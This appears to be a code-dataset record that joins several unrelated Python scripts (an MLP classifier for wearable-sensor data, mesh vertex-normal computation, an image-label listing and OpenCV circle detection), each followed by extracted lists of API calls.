wr\n'), ((33368, 33396), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33376, 33396), True, 'import matplotlib.pyplot as plt\n'), ((33506, 33572), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'discovery_userids'], {}), '(histories_dev, recs[rname], 20, discovery_userids)\n', (33521, 33572), True, 'import wikirecs as wr\n'), ((33577, 33605), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33585, 33605), True, 'import matplotlib.pyplot as plt\n'), ((33715, 33781), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'resurface_userids'], {}), '(histories_dev, recs[rname], 20, resurface_userids)\n', (33730, 33781), True, 'import wikirecs as wr\n'), ((33786, 33814), 'matplotlib.pyplot.plot', 'plt.plot', (['recall_curve', '""".-"""'], {}), "(recall_curve, '.-')\n", (33794, 33814), True, 'import matplotlib.pyplot as plt\n'), ((34081, 34147), 'wikirecs.recall_curve', 'wr.recall_curve', (['histories_dev', 'recs[rname]', '(20)', 'discovery_userids'], {}), '(histories_dev, recs[rname], 20, discovery_userids)\n', (34096, 34147), True, 'import wikirecs as wr\n'), ((34392, 34411), 'numpy.arange', 'np.arange', (['(0)', '(20)', '(2)'], {}), '(0, 20, 2)\n', (34401, 34411), True, 'import numpy as np\n'), ((35535, 35637), 'pandas.DataFrame', 'pd.DataFrame', (['{rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for rec_name in\n recs_subset}'], {}), '({rec_name: [p2t[r] for r in recs[rec_name][userid][:N]] for\n rec_name in recs_subset})\n', (35547, 35637), True, 'import pandas as pd\n'), ((37028, 37141), 'pandas.DataFrame', 'pd.DataFrame', (["{rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][:N] for\n rec_name in recs_subset}"], {}), "({rec_name: [p2t[r] for r in recs[rec_name][n2u['HenryXVII']]][\n :N] for rec_name in recs_subset})\n", (37040, 37141), True, 'import pandas as pd\n'), ((38336, 38421), 'wikirecs.print_user_history', 'wr.print_user_history', ([], {'user': 'edited_pages.index[i]', 
'all_histories': 'clean_histories'}), '(user=edited_pages.index[i], all_histories=clean_histories\n )\n', (38357, 38421), True, 'import wikirecs as wr\n'), ((1229, 1248), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (1246, 1248), False, 'import logging\n'), ((2517, 2571), 'pandas.concat', 'pd.concat', (['[all_histories, oneuser]'], {'ignore_index': '(True)'}), '([all_histories, oneuser], ignore_index=True)\n', (2526, 2571), True, 'import pandas as pd\n'), ((2868, 2892), 'numpy.arange', 'np.arange', (['(0)', '(20000)', '(200)'], {}), '(0, 20000, 200)\n', (2877, 2892), True, 'import numpy as np\n'), ((2989, 3009), 'numpy.arange', 'np.arange', (['(0)', '(200)', '(1)'], {}), '(0, 200, 1)\n', (2998, 3009), True, 'import numpy as np\n'), ((3128, 3150), 'numpy.median', 'np.median', (['edit_counts'], {}), '(edit_counts)\n', (3137, 3150), True, 'import numpy as np\n'), ((6531, 6547), 'numpy.array', 'np.array', (['is_bot'], {}), '(is_bot)\n', (6539, 6547), True, 'import numpy as np\n'), ((11130, 11151), 'pandas.DataFrame', 'pd.DataFrame', (['oneuser'], {}), '(oneuser)\n', (11142, 11151), True, 'import pandas as pd\n'), ((12311, 12359), 'numpy.sum', 'np.sum', (['(implicit_matrix[:, veditors] > 0)'], {'axis': '(1)'}), '(implicit_matrix[:, veditors] > 0, axis=1)\n', (12317, 12359), True, 'import numpy as np\n'), ((14600, 14620), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(1)'], {}), '(0, 100, 1)\n', (14609, 14620), True, 'import numpy as np\n'), ((14686, 14706), 'numpy.arange', 'np.arange', (['(0)', '(100)', '(1)'], {}), '(0, 100, 1)\n', (14695, 14706), True, 'import numpy as np\n'), ((16966, 16977), 'umap.UMAP', 'umap.UMAP', ([], {}), '()\n', (16975, 16977), False, 'import umap\n'), ((17210, 17253), 'numpy.sum', 'np.sum', (['implicit_matrix[indices, :]'], {'axis': '(1)'}), '(implicit_matrix[indices, :], axis=1)\n', (17216, 17253), True, 'import numpy as np\n'), ((17891, 17940), 'numpy.sum', 'np.sum', (['implicit_matrix[actor_indices, :]'], {'axis': '(1)'}), '(implicit_matrix[actor_indices, :], axis=1)\n', (17897, 17940), True, 'import numpy as np\n'), ((18053, 18064), 'umap.UMAP', 'umap.UMAP', ([], {}), '()\n', (18062, 18064), False, 'import umap\n'), ((23547, 23568), 'pandas.DataFrame', 'pd.DataFrame', (['results'], {}), '(results)\n', (23559, 23568), True, 'import pandas as pd\n'), ((34410, 34429), 'numpy.arange', 'np.arange', (['(0)', '(20)', '(2)'], {}), '(0, 20, 2)\n', (34419, 34429), True, 'import numpy as np\n'), ((38482, 38504), 'numpy.arange', 'np.arange', (['(0)', '(2000)', '(20)'], {}), '(0, 2000, 20)\n', (38491, 38504), True, 'import numpy as np\n'), ((5531, 5559), 'numpy.sum', 'np.sum', (['is_popular_page_edit'], {}), '(is_popular_page_edit)\n', (5537, 5559), True, 'import numpy as np\n'), ((6592, 6609), 'numpy.sum', 'np.sum', (['keep_user'], {}), '(keep_user)\n', (6598, 6609), True, 'import numpy as np\n'), ((16687, 16730), 'numpy.sum', 'np.sum', (['implicit_matrix[nonzero, :]'], {'axis': '(1)'}), '(implicit_matrix[nonzero, :], axis=1)\n', (16693, 16730), True, 'import numpy as np\n'), ((17303, 17346), 'numpy.sum', 'np.sum', (['implicit_matrix[indices, :]'], {'axis': '(1)'}), '(implicit_matrix[indices, :], axis=1)\n', (17309, 17346), True, 'import numpy as np\n'), ((17990, 18039), 'numpy.sum', 'np.sum', (['implicit_matrix[actor_indices, :]'], {'axis': '(1)'}), '(implicit_matrix[actor_indices, :], axis=1)\n', (17996, 18039), True, 'import numpy as np\n'), ((25112, 25166), 'wikirecs.prop_resurface', 'wr.prop_resurface', (['jrecs', 'K', 'implicit_matrix', 'i2p', 'u2i'], 
{}), '(jrecs, K, implicit_matrix, i2p, u2i)\n', (25129, 25166), True, 'import wikirecs as wr\n'), ((32446, 32455), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32453, 32455), True, 'import matplotlib.pyplot as plt\n'), ((32562, 32571), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32569, 32571), True, 'import matplotlib.pyplot as plt\n'), ((32641, 32650), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (32648, 32650), True, 'import matplotlib.pyplot as plt\n'), ((34161, 34183), 'numpy.array', 'np.array', (['recall_curve'], {}), '(recall_curve)\n', (34169, 34183), True, 'import numpy as np\n'), ((34482, 34491), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (34489, 34491), True, 'import matplotlib.pyplot as plt\n'), ((34561, 34570), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (34568, 34570), True, 'import matplotlib.pyplot as plt\n'), ((38805, 38825), 'itertools.groupby', 'itertools.groupby', (['d'], {}), '(d)\n', (38822, 38825), False, 'import itertools\n'), ((2459, 2480), 'pandas.DataFrame', 'pd.DataFrame', (['oneuser'], {}), '(oneuser)\n', (2471, 2480), True, 'import pandas as pd\n'), ((4596, 4629), 'itertools.groupby', 'itertools.groupby', (['d'], {'key': 'keyfunc'}), '(d, key=keyfunc)\n', (4613, 4629), False, 'import itertools\n'), ((25035, 25070), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {}), '(histories_test, jrecs, K)\n', (25044, 25070), True, 'import wikirecs as wr\n'), ((25219, 25287), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {'userid_subset': 'discovery_userids'}), '(histories_test, jrecs, K, userid_subset=discovery_userids)\n', (25228, 25287), True, 'import wikirecs as wr\n'), ((25340, 25408), 'wikirecs.recall', 'wr.recall', (['histories_test', 'jrecs', 'K'], {'userid_subset': 'resurface_userids'}), '(histories_test, jrecs, K, userid_subset=resurface_userids)\n', (25349, 25408), True, 'import wikirecs as wr\n'), ((32483, 32500), 'numpy.array', 'np.array', (['xyz[1:]'], {}), '(xyz[1:])\n', (32491, 32500), True, 'import numpy as np\n'), ((5652, 5680), 'numpy.sum', 'np.sum', (['is_popular_page_edit'], {}), '(is_popular_page_edit)\n', (5658, 5680), True, 'import numpy as np\n'), ((6648, 6665), 'numpy.sum', 'np.sum', (['keep_user'], {}), '(keep_user)\n', (6654, 6665), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 23 12:03:59 2017
@author: Kevin
"""
import numpy as np
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import LeaveOneGroupOut,GridSearchCV
dataPath = 'UTDallas/'
dataName = 'UTD'
nJobs = 12 # Number of cores to use
# Load feature matrices, labels, and groups (denoting which labeled time
# segment each row of the feature matrix comes from)
featuresAll = np.loadtxt(dataPath+dataName+'_all.csv',delimiter=',')
featuresAcc = np.loadtxt(dataPath+dataName+'_acc.csv',delimiter=',')
featuresEda = np.loadtxt(dataPath+dataName+'_eda.csv',delimiter=',')
labels = np.loadtxt(dataPath+dataName+'_label.csv')
groups = np.loadtxt(dataPath+dataName+'_groups.csv')
# Indicates the subjects that have no MAs, in order to exclude them during grid search
includeRowsTrain = np.logical_and(
np.logical_and(np.where(groups!=5,True,False),
np.where(groups!=17,True,False)),np.where(groups!=18,True,False))
# Leave-one-group-out cross-validation
cv = LeaveOneGroupOut()
# Parameter tuning by grid search
solver='lbfgs'
activation='relu'
regParam = 10.0**np.arange(-3,5)
# Comment out one of the choices below (either 1 or 2 hidden layers)
# 1 hidden layer
hiddenLayerSizes = 2**np.arange(0,8)
"""
# 2 hidden layers
hidden1,hidden2 = np.meshgrid(2**np.arange(0,8),2**np.arange(0,8))
hiddenLayerSizes = np.reshape(np.stack([hidden1,hidden2]),
(2,np.size(hidden1))).T.tolist()
"""
parameters = {'alpha': regParam,
'hidden_layer_sizes': hiddenLayerSizes}
gsAll = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
                     parameters,scoring='roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsAll.fit(featuresAll[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaAll = gsAll.best_params_['alpha']
bestHiddenSizesAll = gsAll.best_params_['hidden_layer_sizes']
gsAcc = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
                     parameters,scoring='roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsAcc.fit(featuresAcc[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaAcc = gsAcc.best_params_['alpha']
bestHiddenSizesAcc = gsAcc.best_params_['hidden_layer_sizes']
gsEda = GridSearchCV(MLPClassifier(solver=solver,activation=activation),
                     parameters,scoring='roc_auc',n_jobs=nJobs,cv=cv,refit=False,
verbose=1)
gsEda.fit(featuresEda[includeRowsTrain,:],labels[includeRowsTrain],
groups[includeRowsTrain])
bestAlphaEda = gsEda.best_params_['alpha']
bestHiddenSizesEda = gsEda.best_params_['hidden_layer_sizes']
predAll = np.zeros(np.shape(labels))
predAcc = np.zeros(np.shape(labels))
predEda = np.zeros(np.shape(labels))
for train, test in cv.split(featuresAll,labels,groups):
mlpAll = MLPClassifier(hidden_layer_sizes=bestHiddenSizesAll,
solver=solver,alpha=bestAlphaAll)
mlpAll.fit(featuresAll[train,:],labels[train])
predAll[test] = mlpAll.predict_proba(featuresAll[test,:])[:,1]
mlpAcc = MLPClassifier(hidden_layer_sizes=bestHiddenSizesAcc,
solver=solver,alpha=bestAlphaAcc)
mlpAcc.fit(featuresAcc[train,:],labels[train])
predAcc[test] = mlpAcc.predict_proba(featuresAcc[test,:])[:,1]
mlpEda = MLPClassifier(hidden_layer_sizes=bestHiddenSizesEda,
solver=solver,alpha=bestAlphaEda)
mlpEda.fit(featuresEda[train,:],labels[train])
predEda[test] = mlpEda.predict_proba(featuresEda[test,:])[:,1]
# Save the scores for further analysis
#np.save('MLPpredAllScores_UTD',predAll)
#np.save('MLPpredAccScores_UTD',predAcc)
#np.save('MLPpredEdaScores_UTD',predEda)
print('MLP AUC ALL: %f (%s)' % (roc_auc_score(labels,predAll),gsAll.best_params_))
print('MLP AUC ACC: %f (%s)' % (roc_auc_score(labels,predAcc),gsAcc.best_params_))
print('MLP AUC EDA: %f (%s)' % (roc_auc_score(labels,predEda),gsEda.best_params_))
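# Hedged follow-up (added, not part of the original script): per-subject AUCs can be
# derived from the leave-one-group-out scores using the same `groups` vector. Subjects
# whose held-out segments contain only one class are skipped, since AUC is undefined there.
for g in np.unique(groups):
    mask = groups == g
    if np.unique(labels[mask]).size == 2:
        print('Subject %d AUC (ALL features): %f' % (int(g), roc_auc_score(labels[mask], predAll[mask])))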
|
[
"sklearn.metrics.roc_auc_score",
"numpy.shape",
"numpy.where",
"numpy.arange",
"numpy.loadtxt",
"sklearn.neural_network.MLPClassifier",
"sklearn.model_selection.LeaveOneGroupOut"
] |
[((480, 539), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_all.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_all.csv', delimiter=',')\n", (490, 539), True, 'import numpy as np\n'), ((549, 608), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_acc.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_acc.csv', delimiter=',')\n", (559, 608), True, 'import numpy as np\n'), ((618, 677), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_eda.csv')"], {'delimiter': '""","""'}), "(dataPath + dataName + '_eda.csv', delimiter=',')\n", (628, 677), True, 'import numpy as np\n'), ((682, 728), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_label.csv')"], {}), "(dataPath + dataName + '_label.csv')\n", (692, 728), True, 'import numpy as np\n'), ((734, 781), 'numpy.loadtxt', 'np.loadtxt', (["(dataPath + dataName + '_groups.csv')"], {}), "(dataPath + dataName + '_groups.csv')\n", (744, 781), True, 'import numpy as np\n'), ((1066, 1084), 'sklearn.model_selection.LeaveOneGroupOut', 'LeaveOneGroupOut', ([], {}), '()\n', (1082, 1084), False, 'from sklearn.model_selection import LeaveOneGroupOut, GridSearchCV\n'), ((988, 1023), 'numpy.where', 'np.where', (['(groups != 18)', '(True)', '(False)'], {}), '(groups != 18, True, False)\n', (996, 1023), True, 'import numpy as np\n'), ((1170, 1186), 'numpy.arange', 'np.arange', (['(-3)', '(5)'], {}), '(-3, 5)\n', (1179, 1186), True, 'import numpy as np\n'), ((1296, 1311), 'numpy.arange', 'np.arange', (['(0)', '(8)'], {}), '(0, 8)\n', (1305, 1311), True, 'import numpy as np\n'), ((1644, 1695), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, activation=activation)\n', (1657, 1695), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2033, 2084), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, activation=activation)\n', (2046, 2084), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2422, 2473), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'solver': 'solver', 'activation': 'activation'}), '(solver=solver, activation=activation)\n', (2435, 2473), False, 'from sklearn.neural_network import MLPClassifier\n'), ((2809, 2825), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2817, 2825), True, 'import numpy as np\n'), ((2846, 2862), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2854, 2862), True, 'import numpy as np\n'), ((2883, 2899), 'numpy.shape', 'np.shape', (['labels'], {}), '(labels)\n', (2891, 2899), True, 'import numpy as np\n'), ((2971, 3063), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesAll', 'solver': 'solver', 'alpha': 'bestAlphaAll'}), '(hidden_layer_sizes=bestHiddenSizesAll, solver=solver, alpha=\n bestAlphaAll)\n', (2984, 3063), False, 'from sklearn.neural_network import MLPClassifier\n'), ((3221, 3313), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesAcc', 'solver': 'solver', 'alpha': 'bestAlphaAcc'}), '(hidden_layer_sizes=bestHiddenSizesAcc, solver=solver, alpha=\n bestAlphaAcc)\n', (3234, 3313), False, 'from sklearn.neural_network import MLPClassifier\n'), ((3467, 3559), 'sklearn.neural_network.MLPClassifier', 'MLPClassifier', ([], {'hidden_layer_sizes': 'bestHiddenSizesEda', 'solver': 'solver', 'alpha': 'bestAlphaEda'}), 
'(hidden_layer_sizes=bestHiddenSizesEda, solver=solver, alpha=\n bestAlphaEda)\n', (3480, 3559), False, 'from sklearn.neural_network import MLPClassifier\n'), ((919, 953), 'numpy.where', 'np.where', (['(groups != 5)', '(True)', '(False)'], {}), '(groups != 5, True, False)\n', (927, 953), True, 'import numpy as np\n'), ((955, 990), 'numpy.where', 'np.where', (['(groups != 17)', '(True)', '(False)'], {}), '(groups != 17, True, False)\n', (963, 990), True, 'import numpy as np\n'), ((3895, 3925), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predAll'], {}), '(labels, predAll)\n', (3908, 3925), False, 'from sklearn.metrics import roc_auc_score\n'), ((3978, 4008), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predAcc'], {}), '(labels, predAcc)\n', (3991, 4008), False, 'from sklearn.metrics import roc_auc_score\n'), ((4061, 4091), 'sklearn.metrics.roc_auc_score', 'roc_auc_score', (['labels', 'predEda'], {}), '(labels, predEda)\n', (4074, 4091), False, 'from sklearn.metrics import roc_auc_score\n')]
|
# Copyright (c) Facebook, Inc. and its affiliates.
import numpy as np
# vertices: frames x meshVerNum x 3
# trifaces: facePolygonNum x 3 = 22800 x 3
def ComputeNormal(vertices, trifaces):
if vertices.shape[0] > 5000:
print('ComputeNormal: Warning: too big to compute {0}'.format(vertices.shape) )
return
#compute vertex Normals for all frames
U = vertices[:,trifaces[:,1],:] - vertices[:,trifaces[:,0],:] #frames x faceNum x 3
V = vertices[:,trifaces[:,2],:] - vertices[:,trifaces[:,1],:] #frames x faceNum x 3
originalShape = U.shape #remember: frames x faceNum x 3
U = np.reshape(U, [-1,3])
V = np.reshape(V, [-1,3])
faceNormals = np.cross(U,V) #frames x 13776 x 3
from sklearn.preprocessing import normalize
if np.isnan(np.max(faceNormals)):
        print('ComputeNormal: Warning: nan detected in face normals')
return
faceNormals = normalize(faceNormals)
faceNormals = np.reshape(faceNormals, originalShape)
if False: #Slow version
vertex_normals = np.zeros(vertices.shape) #(frames x 11510) x 3
for fIdx, vIdx in enumerate(trifaces[:,0]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
for fIdx, vIdx in enumerate(trifaces[:,1]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
for fIdx, vIdx in enumerate(trifaces[:,2]):
vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
else: #Faster version
# Computing vertex normals, much faster (and obscure) replacement
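        # (Added clarification, hedged): `index` pairs each vertex id with the id of a face
        # that touches it; sorting by vertex id groups each vertex's faces together, and
        # np.add.reduceat then sums the corresponding face normals per vertex in one pass,
        # matching the per-vertex accumulation of the slow branch above. Note the [0] below
        # indexes frame 0 only, so only the first frame's face normals are accumulated here.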
index = np.vstack((np.ravel(trifaces), np.repeat(np.arange(len(trifaces)), 3))).T
index_sorted = index[index[:,0].argsort()]
vertex_normals = np.add.reduceat(faceNormals[:,index_sorted[:, 1],:][0],
np.concatenate(([0], np.cumsum(np.unique(index_sorted[:, 0],
return_counts=True)[1])[:-1])))[None, :]
vertex_normals = vertex_normals.astype(np.float64)
originalShape = vertex_normals.shape
vertex_normals = np.reshape(vertex_normals, [-1,3])
vertex_normals = normalize(vertex_normals)
vertex_normals = np.reshape(vertex_normals,originalShape)
return vertex_normals
def ComputeNormal_gpu(vertices, trifaces):
import torch
import torch.nn.functional as F
if vertices.shape[0] > 5000:
print('ComputeNormal: Warning: too big to compute {0}'.format(vertices.shape) )
return
#compute vertex Normals for all frames
#trifaces_cuda = torch.from_numpy(trifaces.astype(np.long)).cuda()
vertices_cuda = torch.from_numpy(vertices.astype(np.float32)).cuda()
U_cuda = vertices_cuda[:,trifaces[:,1],:] - vertices_cuda[:,trifaces[:,0],:] #frames x faceNum x 3
V_cuda = vertices_cuda[:,trifaces[:,2],:] - vertices_cuda[:,trifaces[:,1],:] #frames x faceNum x 3
originalShape = list(U_cuda.size()) #remember: frames x faceNum x 3
U_cuda = torch.reshape(U_cuda, [-1,3])#.astype(np.float32)
V_cuda = torch.reshape(V_cuda, [-1,3])#.astype(np.float32)
faceNormals = U_cuda.cross(V_cuda)
faceNormals = F.normalize(faceNormals,dim=1)
faceNormals = torch.reshape(faceNormals, originalShape)
# trifaces has duplicated vertex index, so cannot be parallazied
# vertex_normals = torch.zeros(vertices.shape,dtype=torch.float32).cuda() #(frames x 11510) x 3
# for fIdx, vIdx in enumerate(trifaces[:,0]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# for fIdx, vIdx in enumerate(trifaces[:,1]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# for fIdx, vIdx in enumerate(trifaces[:,2]):
# vertex_normals[:,vIdx,:] += faceNormals[:,fIdx,:]
# Computing vertex normals, much faster (and obscure) replacement
index = np.vstack((np.ravel(trifaces), np.repeat(np.arange(len(trifaces)), 3))).T
index_sorted = index[index[:,0].argsort()]
vertex_normals = np.add.reduceat(faceNormals[:,index_sorted[:, 1],:][0],
np.concatenate(([0], np.cumsum(np.unique(index_sorted[:, 0],
return_counts=True)[1])[:-1])))[None, :]
vertex_normals = torch.from_numpy(vertex_normals).float().cuda()
vertex_normals = F.normalize(vertex_normals,dim=2)
vertex_normals = vertex_normals.data.cpu().numpy() #(batch, chunksize, dim)
return vertex_normals
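# Hedged usage sketch (added, not part of the original file): a single triangle in the
# x-y plane should get unit +z normals for all three vertices from ComputeNormal.
if __name__ == "__main__":
    tri_verts = np.array([[[0.0, 0.0, 0.0], [1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]])  # 1 frame x 3 verts x 3
    tri_faces = np.array([[0, 1, 2]])
    print(ComputeNormal(tri_verts, tri_faces))  # expected: (0, 0, 1) for every vertex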
|
[
"numpy.ravel",
"numpy.cross",
"numpy.zeros",
"numpy.max",
"sklearn.preprocessing.normalize",
"numpy.reshape",
"torch.reshape",
"torch.nn.functional.normalize",
"numpy.unique",
"torch.from_numpy"
] |
[((620, 642), 'numpy.reshape', 'np.reshape', (['U', '[-1, 3]'], {}), '(U, [-1, 3])\n', (630, 642), True, 'import numpy as np\n'), ((650, 672), 'numpy.reshape', 'np.reshape', (['V', '[-1, 3]'], {}), '(V, [-1, 3])\n', (660, 672), True, 'import numpy as np\n'), ((690, 704), 'numpy.cross', 'np.cross', (['U', 'V'], {}), '(U, V)\n', (698, 704), True, 'import numpy as np\n'), ((908, 930), 'sklearn.preprocessing.normalize', 'normalize', (['faceNormals'], {}), '(faceNormals)\n', (917, 930), False, 'from sklearn.preprocessing import normalize\n'), ((950, 988), 'numpy.reshape', 'np.reshape', (['faceNormals', 'originalShape'], {}), '(faceNormals, originalShape)\n', (960, 988), True, 'import numpy as np\n'), ((2011, 2046), 'numpy.reshape', 'np.reshape', (['vertex_normals', '[-1, 3]'], {}), '(vertex_normals, [-1, 3])\n', (2021, 2046), True, 'import numpy as np\n'), ((2067, 2092), 'sklearn.preprocessing.normalize', 'normalize', (['vertex_normals'], {}), '(vertex_normals)\n', (2076, 2092), False, 'from sklearn.preprocessing import normalize\n'), ((2114, 2155), 'numpy.reshape', 'np.reshape', (['vertex_normals', 'originalShape'], {}), '(vertex_normals, originalShape)\n', (2124, 2155), True, 'import numpy as np\n'), ((2902, 2932), 'torch.reshape', 'torch.reshape', (['U_cuda', '[-1, 3]'], {}), '(U_cuda, [-1, 3])\n', (2915, 2932), False, 'import torch\n'), ((2965, 2995), 'torch.reshape', 'torch.reshape', (['V_cuda', '[-1, 3]'], {}), '(V_cuda, [-1, 3])\n', (2978, 2995), False, 'import torch\n'), ((3073, 3104), 'torch.nn.functional.normalize', 'F.normalize', (['faceNormals'], {'dim': '(1)'}), '(faceNormals, dim=1)\n', (3084, 3104), True, 'import torch.nn.functional as F\n'), ((3123, 3164), 'torch.reshape', 'torch.reshape', (['faceNormals', 'originalShape'], {}), '(faceNormals, originalShape)\n', (3136, 3164), False, 'import torch\n'), ((4154, 4188), 'torch.nn.functional.normalize', 'F.normalize', (['vertex_normals'], {'dim': '(2)'}), '(vertex_normals, dim=2)\n', (4165, 4188), True, 'import torch.nn.functional as F\n'), ((793, 812), 'numpy.max', 'np.max', (['faceNormals'], {}), '(faceNormals)\n', (799, 812), True, 'import numpy as np\n'), ((1050, 1074), 'numpy.zeros', 'np.zeros', (['vertices.shape'], {}), '(vertices.shape)\n', (1058, 1074), True, 'import numpy as np\n'), ((3758, 3776), 'numpy.ravel', 'np.ravel', (['trifaces'], {}), '(trifaces)\n', (3766, 3776), True, 'import numpy as np\n'), ((1568, 1586), 'numpy.ravel', 'np.ravel', (['trifaces'], {}), '(trifaces)\n', (1576, 1586), True, 'import numpy as np\n'), ((4084, 4116), 'torch.from_numpy', 'torch.from_numpy', (['vertex_normals'], {}), '(vertex_normals)\n', (4100, 4116), False, 'import torch\n'), ((3984, 4033), 'numpy.unique', 'np.unique', (['index_sorted[:, 0]'], {'return_counts': '(True)'}), '(index_sorted[:, 0], return_counts=True)\n', (3993, 4033), True, 'import numpy as np\n'), ((1806, 1855), 'numpy.unique', 'np.unique', (['index_sorted[:, 0]'], {'return_counts': '(True)'}), '(index_sorted[:, 0], return_counts=True)\n', (1815, 1855), True, 'import numpy as np\n')]
|
import os
import numpy as np
import cv2
import sys
#sys.path.insert(0, '/home/kumarak/Desktop/campus_temp/pred2/')
#import get_dataset_colormap
read="./all_at_100_nocol/"
gtread=open("./thinglabels.txt").readlines()
gt={}
#print(gtread)
for i in gtread:
gt[int(i.split(':')[0])]=i.split(':')[1][1:-1]
#print(gt)
#map=get_dataset_colormap.create_label_colormap()
#list=[(map[i],i) for i in range(0,len(map))]
records=[]
for filename in os.listdir(read):
#print(filename)
if filename.endswith('.png'):
img=cv2.imread(read+filename)
classes=[gt[i] for i in np.unique(img) if i!=255]
        records.append((filename,classes))
for i in sorted(records):
print(i)
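# Note (added, hedged): pixel value 255 is excluded above on the assumption that it is the
# void/ignore label in these masks; every other unique value is mapped to its class name
# via thinglabels.txt.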
|
[
"cv2.imread",
"os.listdir",
"numpy.unique"
] |
[((435, 451), 'os.listdir', 'os.listdir', (['read'], {}), '(read)\n', (445, 451), False, 'import os\n'), ((508, 535), 'cv2.imread', 'cv2.imread', (['(read + filename)'], {}), '(read + filename)\n', (518, 535), False, 'import cv2\n'), ((560, 574), 'numpy.unique', 'np.unique', (['img'], {}), '(img)\n', (569, 574), True, 'import numpy as np\n')]
|
import cv2
import numpy as np
img = cv2.imread('imagem.jpg')
##img = cv2.imread('imagem3.jpg',0)
cv2.imshow('imagem',img)
img = cv2.GaussianBlur(img, (7, 5), 0)
cv2.imshow('imagemblur',img)
gray_img = cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
circles = cv2.HoughCircles(gray_img,cv2.HOUGH_GRADIENT,1,30,
param1=50,param2=30,minRadius=0,maxRadius=60)
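# Note (added, hedged): HoughCircles returns None when no circles are found, so the code
# below assumes at least one detection; a defensive version would check
# `if circles is None: raise SystemExit('no circles detected')` before calling np.around.
# For HOUGH_GRADIENT, param1 is the upper Canny edge threshold and param2 the accumulator
# threshold; lowering param2 yields more (possibly spurious) circles.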
cimg = img
circles = np.uint16(np.around(circles))
for i in circles[0,:]:
# draw the outer circle
cv2.circle(cimg,(i[0],i[1]),i[2],(0,255,0),2)
# draw the center of the circle
cv2.circle(cimg,(i[0],i[1]),2,(0,0,255),3)
cv2.circle(cimg,(0,0),i[2],(0,0,255),2)
cv2.circle(cimg,(390,390),i[2],(255,0,0),2)
cv2.imshow('detected circles',cimg)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"cv2.GaussianBlur",
"cv2.HoughCircles",
"cv2.circle",
"cv2.cvtColor",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.imread",
"numpy.around",
"cv2.imshow"
] |
